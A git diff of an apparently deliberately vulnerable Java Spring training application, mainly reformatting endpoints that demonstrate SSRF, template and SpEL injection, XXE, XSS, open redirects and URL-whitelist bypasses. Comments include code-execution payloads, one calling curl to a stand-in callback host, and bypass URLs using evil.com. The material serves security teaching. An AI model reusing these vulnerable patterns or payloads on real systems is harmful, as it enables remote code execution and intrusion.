+            CloseableHttpClient client = HttpClients.createDefault();
+            HttpGet httpGet = new HttpGet(url);
             HttpResponse httpResponse = client.execute(httpGet); // send request
             BufferedReader rd = new BufferedReader(new InputStreamReader(httpResponse.getEntity().getContent()));
-            StringBuilder result = new StringBuilder();
-            String line = null;
+
+            String line;
             while ((line = rd.readLine()) != null) {
                 result.append(line);
             }
+
+            // SecurityUtil.stopSSRFHook();
             return result.toString();
-        }catch (Exception e) {
-            e.printStackTrace();
-            return "fail";
-        }
 
+        } catch (Exception e) {
+            return e.toString();
+        } finally {
+            SecurityUtil.stopSSRFHook();
+        }
     }
 
 
     /**
      * https://mvnrepository.com/artifact/commons-httpclient/commons-httpclient
      * UserAgent: Jakarta Commons-HttpClient/3.1 (2007.08 publish)
-     *
+     * <p>
      * http://localhost:8080/ssrf/commonsHttpClient/sec?url=http://www.baidu.com
      */
     @RequestMapping("/commonsHttpClient/sec")
@@ -230,7 +231,7 @@ public static String commonsHttpClient(@RequestParam String url) {
 
     /**
      * jsoup是一款Java的HTML解析器，可直接解析某个URL地址、HTML文本内容。
-     *
+     * <p>
      * http://localhost:8080/ssrf/Jsoup?url=http://www.baidu.com
      */
     @RequestMapping("/Jsoup")
@@ -279,14 +280,13 @@ public static String IOUtils(@RequestParam String url) {
     /**
      * Safe code.
      * http://localhost:8080/ssrf/ImageIO/sec?url=http://www.baidu.com
-     *
      */
     @RequestMapping("/ImageIO/sec")
     public static String ImageIOSec(@RequestParam String url) {
         try {
             URL u = new URL(url);
             if (!SecurityUtil.checkSSRFWithoutRedirect(url)) {
-                logger.error("[-] SSRF check failed. Original Url: "+ url);
+                logger.error("[-] SSRF check failed. Original Url: " + url);
                 return "SSRF check failed.";
             }
             ImageIO.read(u); // send request
diff --git a/src/main/java/org/joychou/controller/SSTI.java b/src/main/java/org/joychou/controller/SSTI.java
index 70e7c7a6..0c44eb93 100644
--- a/src/main/java/org/joychou/controller/SSTI.java
+++ b/src/main/java/org/joychou/controller/SSTI.java
@@ -17,14 +17,14 @@ public class SSTI {
     /**
      * SSTI of Java velocity. The latest Velocity version still has this problem.
      * Fix method: Avoid to use Velocity.evaluate method.
-     *
+     * <p>
      * http://localhost:8080/ssti/velocity?template=%23set($e=%22e%22);$e.getClass().forName(%22java.lang.Runtime%22).getMethod(%22getRuntime%22,null).invoke(null,null).exec(%22open%20-a%20Calculator%22)
      * Open a calculator in MacOS.
      *
      * @param template exp
      */
     @GetMapping("/velocity")
-    private static void velocity(String template){
+    public void velocity(String template) {
         Velocity.init();
 
         VelocityContext context = new VelocityContext();
diff --git a/src/main/java/org/joychou/controller/SpEL.java b/src/main/java/org/joychou/controller/SpEL.java
index 07be7d7e..6d06ffc7 100644
--- a/src/main/java/org/joychou/controller/SpEL.java
+++ b/src/main/java/org/joychou/controller/SpEL.java
@@ -20,18 +20,18 @@ public class SpEL {
      * xxx is urlencode(exp)
      * exp: T(java.lang.Runtime).getRuntime().exec("curl xxx.ceye.io")
      */
-    @RequestMapping("/spel/vul")
-    private static String rce(String expression) {
+    @RequestMapping("/spel/vuln")
+    public String rce(String expression) {
         ExpressionParser parser = new SpelExpressionParser();
         // fix method: SimpleEvaluationContext
-        String result = parser.parseExpression(expression).getValue().toString();
-        return result;
+        return parser.parseExpression(expression).getValue().toString();
     }
 
-    public static void main(String[] args)  {
+    public static void main(String[] args) {
         ExpressionParser parser = new SpelExpressionParser();
         String expression = "T(java.lang.Runtime).getRuntime().exec(\"open -a Calculator\")";
         String result = parser.parseExpression(expression).getValue().toString();
+        System.out.println(result);
     }
 }
 
diff --git a/src/main/java/org/joychou/controller/Test.java b/src/main/java/org/joychou/controller/Test.java
index 902b2269..8bc0d38b 100644
--- a/src/main/java/org/joychou/controller/Test.java
+++ b/src/main/java/org/joychou/controller/Test.java
@@ -5,7 +5,6 @@
 import org.springframework.web.bind.annotation.ResponseBody;
 
 import javax.servlet.http.Cookie;
-import javax.servlet.http.HttpServletRequest;
 import javax.servlet.http.HttpServletResponse;
 
 @Controller
@@ -14,7 +13,7 @@ public class Test {
 
     @RequestMapping(value = "/")
     @ResponseBody
-    private String Index(HttpServletResponse response, String empId) {
+    public String Index(HttpServletResponse response, String empId) {
 
         System.out.println(empId);
         Cookie cookie = new Cookie("XSRF-TOKEN", "123");
diff --git a/src/main/java/org/joychou/controller/URLRedirect.java b/src/main/java/org/joychou/controller/URLRedirect.java
index d16f0ebb..2b96322e 100644
--- a/src/main/java/org/joychou/controller/URLRedirect.java
+++ b/src/main/java/org/joychou/controller/URLRedirect.java
@@ -10,14 +10,15 @@
 import javax.servlet.http.HttpServletRequest;
 import javax.servlet.http.HttpServletResponse;
 import java.io.IOException;
+
 import org.joychou.security.SecurityUtil;
 
 /**
  * The vulnerability code and security code of Java url redirect.
  * The security code is checking whitelist of url redirect.
  *
- * @author   JoyChou (joychou@joychou.org)
- * @version  2017.12.28
+ * @author JoyChou (joychou@joychou.org)
+ * @version 2017.12.28
  */
 
 @Controller
@@ -38,7 +39,7 @@ public String redirect(@RequestParam("url") String url) {
      */
     @RequestMapping("/setHeader")
     @ResponseBody
-    public static void setHeader(HttpServletRequest request, HttpServletResponse response){
+    public static void setHeader(HttpServletRequest request, HttpServletResponse response) {
         String url = request.getParameter("url");
         response.setStatus(HttpServletResponse.SC_MOVED_PERMANENTLY); // 301 redirect
         response.setHeader("Location", url);
@@ -50,7 +51,7 @@ public static void setHeader(HttpServletRequest request, HttpServletResponse res
      */
     @RequestMapping("/sendRedirect")
     @ResponseBody
-    public static void sendRedirect(HttpServletRequest request, HttpServletResponse response) throws IOException{
+    public static void sendRedirect(HttpServletRequest request, HttpServletResponse response) throws IOException {
         String url = request.getParameter("url");
         response.sendRedirect(url); // 302 redirect
     }
@@ -64,10 +65,10 @@ public static void sendRedirect(HttpServletRequest request, HttpServletResponse
     @ResponseBody
     public static void forward(HttpServletRequest request, HttpServletResponse response) {
         String url = request.getParameter("url");
-        RequestDispatcher rd =request.getRequestDispatcher(url);
-        try{
+        RequestDispatcher rd = request.getRequestDispatcher(url);
+        try {
             rd.forward(request, response);
-        }catch (Exception e) {
+        } catch (Exception e) {
             e.printStackTrace();
         }
     }
@@ -80,7 +81,7 @@ public static void forward(HttpServletRequest request, HttpServletResponse respo
     @RequestMapping("/sendRedirect/sec")
     @ResponseBody
     public void sendRedirect_seccode(HttpServletRequest request, HttpServletResponse response)
-            throws IOException{
+            throws IOException {
         String url = request.getParameter("url");
         if (SecurityUtil.checkURL(url) == null) {
             response.setStatus(HttpServletResponse.SC_FORBIDDEN);
diff --git a/src/main/java/org/joychou/controller/URLWhiteList.java b/src/main/java/org/joychou/controller/URLWhiteList.java
index f4638524..c4b04dc5 100644
--- a/src/main/java/org/joychou/controller/URLWhiteList.java
+++ b/src/main/java/org/joychou/controller/URLWhiteList.java
@@ -15,8 +15,8 @@
  * The vulnerability code and security code of Java url whitelist.
  * The security code is checking url whitelist.
  *
- * @author    JoyChou (joychou@joychou.org)
- * @version   2018.08.23
+ * @author JoyChou (joychou@joychou.org)
+ * @version 2018.08.23
  */
 
 @RestController
@@ -26,17 +26,17 @@ public class URLWhiteList {
 
     private String domainwhitelist[] = {"joychou.org", "joychou.com"};
     private static final Logger logger = LoggerFactory.getLogger(URLWhiteList.class);
+
     /**
      * bypass poc: bypassjoychou.org
      * http://localhost:8080/url/vuln/endswith?url=http://aaajoychou.org
-     *
      */
     @GetMapping("/vuln/endsWith")
-    public String endsWith(@RequestParam("url") String url) throws Exception{
+    public String endsWith(@RequestParam("url") String url) throws Exception {
         URL u = new URL(url);
         String host = u.getHost().toLowerCase();
 
-        for (String domain: domainwhitelist){
+        for (String domain : domainwhitelist) {
             if (host.endsWith(domain)) {
                 return "Good url.";
             }
@@ -46,17 +46,17 @@ public String endsWith(@RequestParam("url") String url) throws Exception{
 
 
     /**
-     * bypass poc: joychou.org.bypass.com or bypassjoychou.org.
+     * It's the same with <code>indexOf</code>.
+     * <p>
      * http://localhost:8080/url/vuln/contains?url=http://joychou.org.bypass.com
      * http://localhost:8080/url/vuln/contains?url=http://bypassjoychou.org
-     *
      */
     @GetMapping("/vuln/contains")
-    public String contains(@RequestParam("url") String url) throws Exception{
+    public String contains(@RequestParam("url") String url) throws Exception {
         URL u = new URL(url);
         String host = u.getHost().toLowerCase();
 
-        for (String domain: domainwhitelist){
+        for (String domain : domainwhitelist) {
             if (host.contains(domain)) {
                 return "Good url.";
             }
@@ -68,10 +68,9 @@ public String contains(@RequestParam("url") String url) throws Exception{
     /**
      * bypass poc: bypassjoychou.org. It's the same with endsWith.
      * http://localhost:8080/url/vuln/regex?url=http://aaajoychou.org
-     *
      */
     @GetMapping("/vuln/regex")
-    public String regex(@RequestParam("url") String url) throws Exception{
+    public String regex(@RequestParam("url") String url) throws Exception {
         URL u = new URL(url);
         String host = u.getHost().toLowerCase();
 
@@ -86,34 +85,16 @@ public String regex(@RequestParam("url") String url) throws Exception{
 
 
     /**
-     * bypass poc: joychou.org.bypass.com or bypassjoychou.org. It's the same with contains.
-     * http://localhost:8080/url/vuln/indexOf?url=http://joychou.org.bypass.com http://bypassjoychou.org
-     *
-     */
-    @GetMapping("/vuln/indexOf")
-    public String indexOf(@RequestParam("url") String url) throws Exception{
-        URL u = new URL(url);
-        String host = u.getHost();
-
-        // If indexOf returns -1, it means that no string was found.
-        for (String domain: domainwhitelist){
-            if (host.indexOf(domain) != -1) {
-                return "Good url.";
-            }
-        }
-        return "Bad url.";
-    }
-
-    /**
-     * The bypass of using java.net.URL to getHost.
-     *
+     * The bypass of using <code>java.net.URL</code> to getHost.
+     * <p>
      * Bypass poc1: curl -v 'http://localhost:8080/url/vuln/url_bypass?url=http://evel.com%5c@www.joychou.org/a.html'
      * Bypass poc2: curl -v 'http://localhost:8080/url/vuln/url_bypass?url=http://evil.com%5cwww.joychou.org/a.html'
-     *
-     * Detail: https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass
+     * <p>
+     * More details: https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass
      */
     @GetMapping("/vuln/url_bypass")
-    public String url_bypass(@RequestParam("url") String url) throws Exception{
+    public String url_bypass(String url) throws Exception {
+
         logger.info("url:  " + url);
         URL u = new URL(url);
 
@@ -125,7 +106,7 @@ public String url_bypass(@RequestParam("url") String url) throws Exception{
         logger.info("host:  " + host);
 
         // endsWith .
-        for (String domain: domainwhitelist){
+        for (String domain : domainwhitelist) {
             if (host.endsWith("." + domain)) {
                 return "Good url.";
             }
@@ -135,14 +116,12 @@ public String url_bypass(@RequestParam("url") String url) throws Exception{
     }
 
 
-
     /**
      * 一级域名白名单 First-level host whitelist.
      * http://localhost:8080/url/sec/endswith?url=http://aa.joychou.org
-     *
      */
     @GetMapping("/sec/endswith")
-    public String sec_endswith(@RequestParam("url") String url) throws Exception{
+    public String sec_endswith(@RequestParam("url") String url) throws Exception {
 
         String whiteDomainlists[] = {"joychou.org", "joychou.com"};
 
@@ -154,7 +133,7 @@ public String sec_endswith(@RequestParam("url") String url) throws Exception{
         String host = uri.getHost().toLowerCase();
 
         // endsWith .
-        for (String domain: whiteDomainlists){
+        for (String domain : whiteDomainlists) {
             if (host.endsWith("." + domain)) {
                 return "Good url.";
             }
@@ -166,10 +145,9 @@ public String sec_endswith(@RequestParam("url") String url) throws Exception{
     /**
      * 多级域名白名单 Multi-level host whitelist.
      * http://localhost:8080/url/sec/multi_level_hos?url=http://ccc.bbb.joychou.org
-     *
      */
     @GetMapping("/sec/multi_level_host")
-    public String sec_multi_level_host(@RequestParam("url") String url) throws Exception{
+    public String sec_multi_level_host(@RequestParam("url") String url) throws Exception {
         String whiteDomainlists[] = {"aaa.joychou.org", "ccc.bbb.joychou.org"};
 
         URI uri = new URI(url);
@@ -179,7 +157,7 @@ public String sec_multi_level_host(@RequestParam("url") String url) throws Excep
         String host = uri.getHost().toLowerCase();
 
         // equals
-        for (String domain: whiteDomainlists){
+        for (String domain : whiteDomainlists) {
             if (host.equals(domain)) {
                 return "Good url.";
             }
@@ -191,10 +169,9 @@ public String sec_multi_level_host(@RequestParam("url") String url) throws Excep
     /**
      * 多级域名白名单 Multi-level host whitelist.
      * http://localhost:8080/url/sec/array_indexOf?url=http://ccc.bbb.joychou.org
-     *
      */
     @GetMapping("/sec/array_indexOf")
-    public String sec_array_indexOf(@RequestParam("url") String url) throws Exception{
+    public String sec_array_indexOf(@RequestParam("url") String url) throws Exception {
 
         // Define muti-level host whitelist.
         ArrayList<String> whiteDomainlists = new ArrayList<>();
diff --git a/src/main/java/org/joychou/controller/XSS.java b/src/main/java/org/joychou/controller/XSS.java
index 68e89c0c..1c4b8732 100644
--- a/src/main/java/org/joychou/controller/XSS.java
+++ b/src/main/java/org/joychou/controller/XSS.java
@@ -26,8 +26,7 @@ public class XSS {
      */
     @RequestMapping("/reflect")
     @ResponseBody
-    public static String reflect(String xss)
-    {
+    public static String reflect(String xss) {
         return xss;
     }
 
@@ -40,8 +39,7 @@ public static String reflect(String xss)
      */
     @RequestMapping("/stored/store")
     @ResponseBody
-    public String store(String xss, HttpServletResponse response)
-    {
+    public String store(String xss, HttpServletResponse response) {
         Cookie cookie = new Cookie("xss", xss);
         response.addCookie(cookie);
         return "Set param into cookie";
@@ -56,19 +54,17 @@ public String store(String xss, HttpServletResponse response)
      */
     @RequestMapping("/stored/show")
     @ResponseBody
-    public String show(@CookieValue("xss") String xss)
-    {
+    public String show(@CookieValue("xss") String xss) {
         return xss;
     }
 
     /**
      * safe Code.
      * http://localhost:8080/xss/safe
-     *
      */
     @RequestMapping("/safe")
     @ResponseBody
-    public static String safe(String xss){
+    public static String safe(String xss) {
         return encode(xss);
     }
 
diff --git a/src/main/java/org/joychou/controller/XStreamRce.java b/src/main/java/org/joychou/controller/XStreamRce.java
index 20b96147..62616e95 100644
--- a/src/main/java/org/joychou/controller/XStreamRce.java
+++ b/src/main/java/org/joychou/controller/XStreamRce.java
@@ -21,14 +21,14 @@ public class XStreamRce {
      * @author JoyChou @2019-07-26
      */
     @PostMapping("/xstream")
-    public String parseXml(HttpServletRequest request) throws Exception{
+    public String parseXml(HttpServletRequest request) throws Exception {
         String xml = WebUtils.getRequestBody(request);
         XStream xstream = new XStream(new DomDriver());
         xstream.fromXML(xml);
         return "xstream";
     }
 
-    public static void main(String[] args) throws Exception {
+    public static void main(String[] args) {
         User user = new User();
         user.setId(0);
         user.setUsername("admin");
@@ -37,7 +37,7 @@ public static void main(String[] args) throws Exception {
         String xml = xstream.toXML(user); // Serialize
         System.out.println(xml);
 
-        user = (User)xstream.fromXML(xml); // Deserialize
-        System.out.println(user.getId() + ": " + user.getUsername() );
+        user = (User) xstream.fromXML(xml); // Deserialize
+        System.out.println(user.getId() + ": " + user.getUsername());
     }
 }
diff --git a/src/main/java/org/joychou/controller/XXE.java b/src/main/java/org/joychou/controller/XXE.java
index 1de059ce..f9a4c7fc 100644
--- a/src/main/java/org/joychou/controller/XXE.java
+++ b/src/main/java/org/joychou/controller/XXE.java
@@ -5,6 +5,7 @@
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 import org.springframework.web.bind.annotation.*;
+
 import javax.servlet.http.HttpServletRequest;
 
 import org.w3c.dom.Document;
@@ -12,13 +13,16 @@
 import org.w3c.dom.NodeList;
 import org.xml.sax.helpers.XMLReaderFactory;
 import org.xml.sax.XMLReader;
+
 import java.io.*;
+
 import org.xml.sax.InputSource;
 
 import javax.xml.parsers.DocumentBuilder;
 import javax.xml.parsers.DocumentBuilderFactory;
 import javax.xml.parsers.SAXParserFactory;
 import javax.xml.parsers.SAXParser;
+
 import org.xml.sax.helpers.DefaultHandler;
 import org.apache.commons.digester3.Digester;
 import org.jdom2.input.SAXBuilder;
@@ -34,7 +38,7 @@
 @RequestMapping("/xxe")
 public class XXE {
 
-    private static Logger logger= LoggerFactory.getLogger(XXE.class);
+    private static Logger logger = LoggerFactory.getLogger(XXE.class);
     private static String EXCEPT = "xxe except";
 
     @RequestMapping(value = "/xmlReader/vuln", method = RequestMethod.POST)
@@ -235,14 +239,14 @@ public String DocumentBuilderVuln01(HttpServletRequest request) {
             Document document = db.parse(is);  // parse xml
 
             // 遍历xml节点name和value
-            StringBuffer buf = new StringBuffer();
+            StringBuilder buf = new StringBuilder();
             NodeList rootNodeList = document.getChildNodes();
             for (int i = 0; i < rootNodeList.getLength(); i++) {
                 Node rootNode = rootNodeList.item(i);
                 NodeList child = rootNode.getChildNodes();
                 for (int j = 0; j < child.getLength(); j++) {
                     Node node = child.item(j);
-                    buf.append(node.getNodeName() + ": " + node.getTextContent() + "\n");
+                    buf.append(String.format("%s: %s\n", node.getNodeName(), node.getTextContent()));
                 }
             }
             sr.close();
@@ -268,7 +272,7 @@ public String DocumentBuilderVuln02(HttpServletRequest request) {
             Document document = db.parse(is);  // parse xml
 
             // 遍历xml节点name和value
-            StringBuffer result = new StringBuffer();
+            StringBuilder result = new StringBuilder();
             NodeList rootNodeList = document.getChildNodes();
             for (int i = 0; i < rootNodeList.getLength(); i++) {
                 Node rootNode = rootNodeList.item(i);
@@ -277,8 +281,7 @@ public String DocumentBuilderVuln02(HttpServletRequest request) {
                     Node node = child.item(j);
                     // 正常解析XML，需要判断是否是ELEMENT_NODE类型。否则会出现多余的的节点。
                     if (child.item(j).getNodeType() == Node.ELEMENT_NODE) {
-                        result.append(node.getNodeName() + ": " +
-                                node.getFirstChild().getNodeValue() + "\n");
+                        result.append(String.format("%s: %s\n", node.getNodeName(), node.getFirstChild()));
                     }
                 }
             }
@@ -329,17 +332,7 @@ public String DocumentBuilderXincludeVuln(HttpServletRequest request) {
             Document document = db.parse(is);  // parse xml
 
             NodeList rootNodeList = document.getChildNodes();
-
-            for (int i = 0; i < rootNodeList.getLength(); i++) {
-                Node rootNode = rootNodeList.item(i);
-                NodeList xxe = rootNode.getChildNodes();
-                for (int j = 0; j < xxe.getLength(); j++) {
-                    Node xxeNode = xxe.item(j);
-                    // 测试不能blind xxe，所以强行加了一个回显
-                    logger.info("xxeNode: " + xxeNode.getNodeValue());
-                }
-
-            }
+            response(rootNodeList);
 
             sr.close();
             return "DocumentBuilder xinclude xxe vuln code";
@@ -362,23 +355,14 @@ public String DocumentBuilderXincludeSec(HttpServletRequest request) {
             dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
             dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
             dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
+
             DocumentBuilder db = dbf.newDocumentBuilder();
             StringReader sr = new StringReader(body);
             InputSource is = new InputSource(sr);
             Document document = db.parse(is);  // parse xml
 
             NodeList rootNodeList = document.getChildNodes();
-
-            for (int i = 0; i < rootNodeList.getLength(); i++) {
-                Node rootNode = rootNodeList.item(i);
-                NodeList xxe = rootNode.getChildNodes();
-                for (int j = 0; j < xxe.getLength(); j++) {
-                    Node xxeNode = xxe.item(j);
-                    // 测试不能blind xxe，所以强行加了一个回显
-                    logger.info("xxeNode: " + xxeNode.getNodeValue());
-                }
-
-            }
+            response(rootNodeList);
 
             sr.close();
         } catch (Exception e) {
@@ -437,7 +421,7 @@ public String XMLReaderSec(HttpServletRequest request) {
      */
     @PostMapping("/DocumentHelper/vuln")
     public String DocumentHelper(HttpServletRequest req) {
-        try{
+        try {
             String body = WebUtils.getRequestBody(req);
             DocumentHelper.parseText(body); // parse xml
         } catch (Exception e) {
@@ -448,7 +432,21 @@ public String DocumentHelper(HttpServletRequest req) {
         return "DocumentHelper xxe vuln code";
     }
 
-    public static void main(String[] args) throws Exception {
+
+    private static void response(NodeList rootNodeList){
+        for (int i = 0; i < rootNodeList.getLength(); i++) {
+            Node rootNode = rootNodeList.item(i);
+            NodeList xxe = rootNode.getChildNodes();
+            for (int j = 0; j < xxe.getLength(); j++) {
+                Node xxeNode = xxe.item(j);
+                // 测试不能blind xxe，所以强行加了一个回显
+                logger.info("xxeNode: " + xxeNode.getNodeValue());
+            }
+
+        }
+    }
+
+    public static void main(String[] args)  {
     }
 
 }
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java b/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java
index 6cefe27f..3000d558 100644
--- a/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java
+++ b/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java
@@ -16,7 +16,6 @@
 import java.io.IOException;
 import java.util.Iterator;
 
-import static org.apache.commons.lang.StringUtils.isBlank;
 
 /**
  * Desc:   poi-ooxml xxe vuln code
@@ -43,7 +42,7 @@ public String index() {
 
     @PostMapping("/readxlsx")
     @ResponseBody
-    public String ooxml_xxe(MultipartFile file)throws IOException {
+    public String ooxml_xxe(MultipartFile file) throws IOException {
         XSSFWorkbook wb = new XSSFWorkbook(file.getInputStream()); // xxe vuln
 
         XSSFSheet sheet = wb.getSheetAt(0);
@@ -51,29 +50,26 @@ public String ooxml_xxe(MultipartFile file)throws IOException {
         XSSFCell cell;
 
         Iterator rows = sheet.rowIterator();
-        String result = "";
+        StringBuilder sbResult = new StringBuilder();
 
-        while (rows.hasNext())
-        {
-            row=(XSSFRow) rows.next();
+        while (rows.hasNext()) {
+
+            row = (XSSFRow) rows.next();
             Iterator cells = row.cellIterator();
-            while (cells.hasNext())
-            {
-                cell=(XSSFCell) cells.next();
+
+            while (cells.hasNext()) {
+                cell = (XSSFCell) cells.next();
 
                 if (cell.getCellType() == XSSFCell.CELL_TYPE_STRING) {
-                    result += cell.getStringCellValue()+ " ";
-                } else if(cell.getCellType() == XSSFCell.CELL_TYPE_NUMERIC) {
-                    result += cell.getNumericCellValue()+ " ";
+                    sbResult.append(cell.getStringCellValue()).append(" ");
+                } else if (cell.getCellType() == XSSFCell.CELL_TYPE_NUMERIC) {
+                    sbResult.append(cell.getNumericCellValue()).append(" ");
                 } else {
                     logger.info("errors");
                 }
             }
         }
-        if ( isBlank(result) ){
-            result = "xxe test";
-        }
 
-        return result;
+        return sbResult.toString();
     }
 }
diff --git a/src/main/java/org/joychou/controller/othervulns/xlsxStreamerXXE.java b/src/main/java/org/joychou/controller/othervulns/xlsxStreamerXXE.java
index 4ca4bf2f..ec054ffd 100644
--- a/src/main/java/org/joychou/controller/othervulns/xlsxStreamerXXE.java
+++ b/src/main/java/org/joychou/controller/othervulns/xlsxStreamerXXE.java
@@ -33,12 +33,12 @@ public String index() {
 
 
     @PostMapping("/readxlsx")
-    public void xllx_streamer_xxe(MultipartFile file)throws IOException {
-        Workbook wb = StreamingReader.builder().open(file.getInputStream());
+    public void xllx_streamer_xxe(MultipartFile file) throws IOException {
+        StreamingReader.builder().open(file.getInputStream());
     }
 
 
     public static void main(String[] args) throws Exception {
-        Workbook wb = StreamingReader.builder().open((new FileInputStream("poc.xlsx")));
+        StreamingReader.builder().open((new FileInputStream("poc.xlsx")));
     }
 }
diff --git a/src/main/java/org/joychou/filter/OriginFilter.java b/src/main/java/org/joychou/filter/OriginFilter.java
index 4e2e9716..32195a27 100644
--- a/src/main/java/org/joychou/filter/OriginFilter.java
+++ b/src/main/java/org/joychou/filter/OriginFilter.java
@@ -14,8 +14,8 @@
 
 /**
  * 推荐使用该全局方案修复Cors跨域漏洞，因为可以校验一级域名。
- * @author JoyChou @ 2019.12.19
  *
+ * @author JoyChou @ 2019.12.19
  */
 @WebFilter(filterName = "OriginFilter", urlPatterns = "/cors/sec/originFilter")
 public class OriginFilter implements Filter {
@@ -25,20 +25,20 @@ public void init(FilterConfig filterConfig) throws ServletException {
 
     }
 
-    private final Logger logger= LoggerFactory.getLogger(this.getClass());
+    private final Logger logger = LoggerFactory.getLogger(this.getClass());
 
     @Override
     public void doFilter(ServletRequest req, ServletResponse res, FilterChain filterChain)
             throws IOException, ServletException {
 
-        HttpServletRequest request = (HttpServletRequest)req;
-        HttpServletResponse response = (HttpServletResponse)res;
+        HttpServletRequest request = (HttpServletRequest) req;
+        HttpServletResponse response = (HttpServletResponse) res;
 
         String origin = request.getHeader("Origin");
         logger.info("[+] Origin: " + origin + "\tCurrent url:" + request.getRequestURL());
 
         // 以file协议访问html，origin为字符串的null，所以依然会走安全check逻辑
-        if ( origin != null && SecurityUtil.checkURL(origin) == null) {
+        if (origin != null && SecurityUtil.checkURL(origin) == null) {
             logger.error("[-] Origin check error. " + "Origin: " + origin +
                     "\tCurrent url:" + request.getRequestURL());
             response.setStatus(response.SC_FORBIDDEN);
diff --git a/src/main/java/org/joychou/filter/ReferFilter.java b/src/main/java/org/joychou/filter/ReferFilter.java
index b2326f9f..da1030e6 100644
--- a/src/main/java/org/joychou/filter/ReferFilter.java
+++ b/src/main/java/org/joychou/filter/ReferFilter.java
@@ -18,9 +18,8 @@
 /**
  * Check referer for all GET requests with callback parameters.
  * If the check of referer fails, a 403 forbidden error page will be returned.
- *
+ * <p>
  * Still need to add @ServletComponentScan annotation in Application.java.
- *
  */
 @WebFilter(filterName = "referFilter", urlPatterns = "/*")
 public class ReferFilter implements Filter {
@@ -30,7 +29,7 @@ public void init(FilterConfig filterConfig) throws ServletException {
 
     }
 
-    private final Logger logger= LoggerFactory.getLogger(this.getClass());
+    private final Logger logger = LoggerFactory.getLogger(this.getClass());
 
     @Override
     public void doFilter(ServletRequest req, ServletResponse res, FilterChain filterChain)
@@ -43,8 +42,8 @@ public void doFilter(ServletRequest req, ServletResponse res, FilterChain filter
         boolean isMatch = false;
 
         // 获取要校验Referer的Uri
-        for (String uri: WebConfig.getReferUris()) {
-            if ( matcher.match (uri, request.getRequestURI()) ) {
+        for (String uri : WebConfig.getReferUris()) {
+            if (matcher.match(uri, request.getRequestURI())) {
                 isMatch = true;
                 break;
             }
@@ -63,9 +62,9 @@ public void doFilter(ServletRequest req, ServletResponse res, FilterChain filter
         // Check referer for all GET requests with callback parameters.
 
         String reqCallback = request.getParameter(WebConfig.getBusinessCallback());
-        if ("GET".equals(request.getMethod()) && StringUtils.isNotBlank(reqCallback) ){
+        if ("GET".equals(request.getMethod()) && StringUtils.isNotBlank(reqCallback)) {
             // If the check of referer fails, a 403 forbidden error page will be returned.
-            if (SecurityUtil.checkURL(refer) == null ){
+            if (SecurityUtil.checkURL(refer) == null) {
                 logger.info("[-] URL: " + request.getRequestURL() + "?" + request.getQueryString() + "\t"
                         + "Referer: " + refer);
                 response.setStatus(HttpServletResponse.SC_FORBIDDEN);
@@ -76,7 +75,6 @@ public void doFilter(ServletRequest req, ServletResponse res, FilterChain filter
         }
 
 
-
         filterChain.doFilter(req, res);
     }
 
diff --git a/src/main/java/org/joychou/security/SecurityUtil.java b/src/main/java/org/joychou/security/SecurityUtil.java
index 2cbe52ab..a1c4cfc6 100644
--- a/src/main/java/org/joychou/security/SecurityUtil.java
+++ b/src/main/java/org/joychou/security/SecurityUtil.java
@@ -1,6 +1,8 @@
 package org.joychou.security;
 
 import org.joychou.config.WebConfig;
+import org.joychou.security.ssrf.SSRFChecker;
+import org.joychou.security.ssrf.SocketHook;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 
@@ -116,26 +118,22 @@ public static boolean checkSSRFWithoutRedirect(String url) {
         if(url == null) {
             return false;
         }
-        return !SSRFChecker.isInnerIPByUrl(url);
+        return !SSRFChecker.isInternalIpByUrl(url);
     }
 
     /**
-     * @Author liergou
-     * @Description 基于Socket hook 进行SSRF检测拦截
-     * @Date 2:15 2020/4/4
-     * @Param []
-     * @return void
-     **/
+     * Check ssrf by hook socket. Start socket hook.
+     *
+     * @author liergou @ 2020-04-04 02:15
+     */
     public static void startSSRFHook() throws NoSuchFieldException, IOException {
         SocketHook.startHook();
     }
 
     /**
-     * @Author liergou
-     * @Description 关闭Socket hook
-     * @Date 2:15 2020/4/4
-     * @Param []
-     * @return void
+     * Close socket hook.
+     *
+     * @author liergou @ 2020-04-04 02:15
      **/
     public static void stopSSRFHook(){
         SocketHook.stopHook();
diff --git a/src/main/java/org/joychou/security/SocketHookFactory.java b/src/main/java/org/joychou/security/SocketHookFactory.java
deleted file mode 100644
index 2dbe738f..00000000
--- a/src/main/java/org/joychou/security/SocketHookFactory.java
+++ /dev/null
@@ -1,77 +0,0 @@
-package org.joychou.security;
-
-
-import java.io.IOException;
-import java.lang.reflect.Field;
-import java.net.Socket;
-import java.net.SocketImpl;
-import java.net.SocketImplFactory;
-import java.util.logging.Level;
-import java.util.logging.Logger;
-
-
-/**
- * @Author liergou
- * @Description socket factory impl
- * @Date 23:41 2020/4/3
- * @Param
- * @return
- **/
-public class SocketHookFactory implements SocketImplFactory
-    {
-        private static SocketImpl   clazz;
-        private static Boolean isHook = false;
-
-        /**
-         * @Author liergou
-         * @Description switch hook
-         * @Date 23:42 2020/4/2
-         * @Param [set]
-         * @return void
-         **/
-        public static void setHook(Boolean set){
-            isHook = set;
-        }
-
-        /**
-         * @Author liergou
-         * @Description 初始化
-         * @Date 23:42 2020/4/2
-         * @Param []
-         * @return void
-         **/
-        public static synchronized void initSocket() throws NoSuchFieldException {
-            if ( clazz != null ) { return; }
-
-            Socket  socket = new Socket();
-            try{
-                Field implField = Socket.class.getDeclaredField("impl");
-                implField.setAccessible( true );
-                clazz = (SocketImpl) implField.get(socket);
-            }catch (NoSuchFieldException | IllegalAccessException e){
-                throw new RuntimeException("SocketHookFactory init failed!");
-            }
-
-            try {
-                socket.close();
-            }
-            catch ( IOException ignored)
-            {
-
-            }
-        }
-
-        public SocketImpl createSocketImpl() {
-
-            if(isHook) {
-                    try {
-                        return new SocketHookImpl(clazz);
-                    } catch (Exception e) {
-                        Logger.getLogger(SocketHookFactory.class.getName()).log(Level.WARNING, "hook 失败  请检查" );
-                        return clazz;
-                    }
-            }else{
-                return clazz;
-            }
-        }
-    }
